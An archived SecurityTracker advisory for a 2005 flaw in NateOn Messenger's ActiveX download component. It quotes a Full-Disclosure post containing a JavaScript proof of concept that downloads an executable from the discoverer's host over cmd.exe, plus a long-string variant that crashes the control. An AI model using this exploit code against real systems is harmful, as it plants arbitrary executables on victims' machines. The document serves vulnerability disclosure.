Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
NateOn Messenger Buffer Overflow in 'NateonDownloadManager.ocx' Lets Remote Users Upload Files and Also Deny Service
|
|
SecurityTracker Alert ID: 1014987
|
|
SecurityTracker URL: http://securitytracker.com/id?1014987
|
|
CVE Reference: CVE-2005-3113
, CVE-2005-3114
(Links to External Site)
|
Updated: Jun 15 2008
|
Original Entry Date: Sep 29 2005
|
Impact: Denial of service via network, Modification of system information, Modification of user information, User access via network
|
Exploit Included: Yes
|
Description: A vulnerability was reported in NateOn Messenger. A remote user can cause denial of service conditions. A remote user can upload files to the target user's system.
A remote user can create specially crafted HTML that, when loaded by the target user, will trigger a buffer overflow in the 'NateonDownloadManager.ocx'
ActiveX component, causing the target user's application to crash.
A remote user can also cause arbitrary files to be downloaded
to arbitrary locations on the target user's system.
The vendor was notified on September 17, 2005.
GYU TAE PARK discovered
this vulnerability.
|
Impact: A remote user can cause the target user's application to crash.
A remote user can also download arbitrary files to arbitrary locations on the target user's system.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: nateonweb.nate.com/ (Links to External Site)
|
Cause: Access control error, Boundary error
|
Underlying OS: Windows (Any)
|
Reported By: "saintlinu" <saintlinu@yahoo.co.kr>
|
Message History:
None.
|
Source Message Contents
|
Date: Thu, 29 Sep 2005 11:36:27 +0800
From: "saintlinu" <saintlinu@yahoo.co.kr>
Subject: [Full-disclosure] [NRVA05-08] - Arbitrary file download by NateOn
|
This is a multi-part message in MIME format.
--===============2108474384==
Content-Type: multipart/alternative;
boundary="----=_NextPart_000_009F_01C5C4EA.07FD7690"
This is a multi-part message in MIME format.
------=_NextPart_000_009F_01C5C4EA.07FD7690
Content-Type: text/plain;
charset="ks_c_5601-1987"
Content-Transfer-Encoding: 7bit
Title: Arbitrary File Download by NateOn Messagener's ActiveX
and DoS
Discoverer: PARK, GYU TAE (saintlinu@null2root.org)
Advisory No.: NRVA05-08
Critical: Moderately Critical
Impact: Arbitrary file download by NateOn Messagener's ActiveX
and DoS
Where: From remote
Operating System: Windows Only
Solution: unpatch yet
Workaround: N / A
Notice: 09. 17. 2005 Initiate notified
09. 23. 2005 2nd notified
09. 27. 2005 3rd notified
09. 29. 2005 Vendor didn't response. Disclosure
vulnerability
Description:
The NateOn Messenger(See a NRVA05-02) is Internet Instance Messenger such
as MSN, YAHOO and so on
If installed NateOn Messenger then can exploit by
'NateonDownloadManager.ocx' ActiveX
and there is another vulnerability like Buffer Overflow
See following detail describe:
NOT INCLUDED HERE BUT A PIECE OF CODE
<--snip-->
i = GotNate.IsNateonInstall();
if( i == 1 ) {
alert('NateOn Messenger already installed. Do
Attack ...');
// if you want to second order attack then try
i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','c:\\windows\\
system32\\cmd.exe');
// if you want to crash to victim system the try
i =
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','very_long_str
ings_in_here');
} else {
alert('NateOn Messenger NOT Installed');
}
</--snip-->
------=_NextPart_000_009F_01C5C4EA.07FD7690
Content-Type: text/html;
charset="ks_c_5601-1987"
Content-Transfer-Encoding: quoted-printable
<html xmlns:o=3D"urn:schemas-microsoft-com:office:office" =
xmlns:w=3D"urn:schemas-microsoft-com:office:word" =
xmlns=3D"http://www.w3.org/TR/REC-html40">
<head>
<meta http-equiv=3DContent-Type content=3D"text/html; =
charset=3Dks_c_5601-1987">
<meta name=3DGenerator content=3D"Microsoft Word 11 (filtered medium)">
<style>
<!--
/* Font Definitions */
@font-face
{font-family:=B9=D9=C5=C1;
panose-1:2 3 6 0 0 1 1 1 1 1;}
@font-face
{font-family:=B1=BC=B8=B2;
panose-1:2 11 6 0 0 1 1 1 1 1;}
@font-face
{font-family:"\@=B1=BC=B8=B2";
panose-1:2 11 6 0 0 1 1 1 1 1;}
@font-face
{font-family:"\@=B9=D9=C5=C1";
panose-1:2 3 6 0 0 1 1 1 1 1;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
{margin:0cm;
margin-bottom:.0001pt;
text-align:justify;
text-justify:inter-ideograph;
text-autospace:none;
word-break:break-hangul;
font-size:10.0pt;
font-family:=B9=D9=C5=C1;}
a:link, span.MsoHyperlink
{color:blue;
text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
{color:purple;
text-decoration:underline;}
span.EmailStyle17
{mso-style-type:personal-compose;
font-family:=B1=BC=B8=B2;
color:windowtext;}
/* Page Definitions */
@page Section1
{size:595.3pt 841.9pt;
margin:99.25pt 3.0cm 3.0cm 3.0cm;
layout-grid:18.0pt;}
div.Section1
{page:Section1;}
-->
</style>
</head>
<body lang=3DKO link=3Dblue vlink=3Dpurple>
<div class=3DSection1 style=3D'layout-grid:18.0pt'>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Title: &n
bsp=
;
Arbitrary File Download by NateOn Messagener's ActiveX and =
DoS<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Discoverer: =
PARK, GYU
TAE (saintlinu@null2root.org)<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Advisory No.: =
NRVA05-08<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Critical: &
n=
bsp;
Moderately Critical<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Impact: &
nbs=
p;
Arbitrary file download by NateOn Messagener's ActiveX and =
DoS<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Where: &n
bsp=
;
>From remote<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Operating System: Windows =
Only<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Solution: &
n=
bsp;
unpatch yet<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Workaround: =
N / A<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Notice: &
nbs=
p;
09. 17. 2005 Initiate notified<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> =
&
nbsp; &=
nbsp; 09.
23. 2005 2nd notified<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
;
09. 27. 2005 3rd notified<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
;
09. 29. 2005 Vendor didn't response. Disclosure =
vulnerability<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>Description: <o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>The NateOn Messenger(See a NRVA05-02) is =
Internet Instance
Messenger such as MSN, YAHOO and so on<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>If installed NateOn Messenger then can exploit =
by
'NateonDownloadManager.ocx' ActiveX<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>and there is another vulnerability like Buffer =
Overflow<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>See following detail =
describe:<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'>NOT INCLUDED HERE BUT A PIECE OF =
CODE<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><--snip--><o:p></o:p></span></font><
/p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; i
=3D GotNate.IsNateonInstall();<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; <o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; if(
i =3D=3D 1 ) {<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; &
nbsp; =
alert('NateOn
Messenger already installed. Do Attack =
...');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; &
nbsp; =
//
if you want to second order attack then try<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; &
nbsp; =
i
=3D
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','=
c:\\windows\\system32\\cmd.exe');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; &
nbsp; =
<o:p></o:p></span><
/font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; &
nbsp; =
//
if you want to crash to victim system the =
try<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; &
nbsp; =
</span></font><font
face=3D=B1=BC=B8=B2><span style=3D'font-family:=B1=BC=B8=B2'>i =3D
GotNate.Excute("1",'http://saintlinu.null2root.org/gotit.exe','=
very_long_strings_in_here');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; }
else {<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; &
nbsp; =
</span></font><font
face=3D=B1=BC=B8=B2><span lang=3DEN-US =
style=3D'font-family:=B1=BC=B8=B2'>alert('NateOn Messenger NOT
Installed');<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'> &
nbsp=
; }<o:p></o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'><o:p> </o:p></span></font></p>
<p class=3DMsoNormal><font size=3D2 face=3D=B1=BC=B8=B2><span =
lang=3DEN-US style=3D'font-size:10.0pt;
font-family:=B1=BC=B8=B2'></--snip--><o:p></o:p></span></font><
/p>
</div>
</body>
</html>
------=_NextPart_000_009F_01C5C4EA.07FD7690--
________________________________________________________
¹«·á 1GB¿ë·®!, ´õ ÀÌ»ó ¿ë·® °í¹Î¾ø´Â - ¾ßÈÄ! ¸ÞÀÏ (http://mail.yahoo.co.kr)
ÃֽŠÈÞ´ëÆù Á¤º¸, º§¼Ò¸®, ij¸¯ÅÍ, ¹®ÀÚ¸Þ¼¼Áö - ¾ßÈÄ! ¸ð¹ÙÀÏ (http://kr.mobile.yahoo.com)
´ëÇѹα¹ ºí·Î±×°¡ ¸ðÀÎ °÷! - ¾ßÈÄ! ÇÇÇøµ(http://kr.ring.yahoo.com)
--===============2108474384==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--===============2108474384==--
________________________________________________________
¹«·á 1GB¿ë·®!, ´õ ÀÌ»ó ¿ë·® °í¹Î¾ø´Â - ¾ßÈÄ! ¸ÞÀÏ (http://mail.yahoo.co.kr)
ÃֽŠÈÞ´ëÆù Á¤º¸, º§¼Ò¸®, ij¸¯ÅÍ, ¹®ÀÚ¸Þ¼¼Áö - ¾ßÈÄ! ¸ð¹ÙÀÏ (http://kr.mobile.yahoo.com)
´ëÇѹα¹ ºí·Î±×°¡ ¸ðÀÎ °÷! - ¾ßÈÄ! ÇÇÇøµ(http://kr.ring.yahoo.com)
|
|
Go to the Top of This SecurityTracker Archive Page
|
